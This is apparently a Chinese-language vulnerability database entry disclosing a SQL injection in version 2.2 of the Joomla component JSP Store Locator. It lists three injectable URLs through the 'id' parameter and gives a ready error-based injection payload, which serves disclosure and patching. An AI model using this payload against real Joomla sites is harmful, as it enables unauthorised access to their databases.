Joomla! Component JSP Store Locator...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Joomla! Component JSP Store Locator v2.2 - SQL Injection index.php中的id参数带入SQL语句存在GET类型注入 注入点: http://localhost/[PATH]/index.php?option=com_jsplocation&task=directionview&id=[SQL] http://localhost/[PATH]/index.php?option=com_jsplocation&task=redirectviewinfo&id=[SQL] http://localhost/[PATH]/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=[SQL] 报错注入 payload: option=com_jsplocation&task=directionview&id=1 AND (SELECT 5712 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(5712=5712,1))),0x7171707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) 测试截图: ![](https://images.seebug.org/contribute/9c330c82-6f55-462a-b561-bbc769fd168f) 其他类型的注入: ![](https://images.seebug.org/contribute/e6896915-2bc5-4d64-8e2f-15d5a24a8225) PoC验证: ![](https://images.seebug.org/contribute/bcbbb09d-af86-4d29-95ca-7c1bf183650c)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息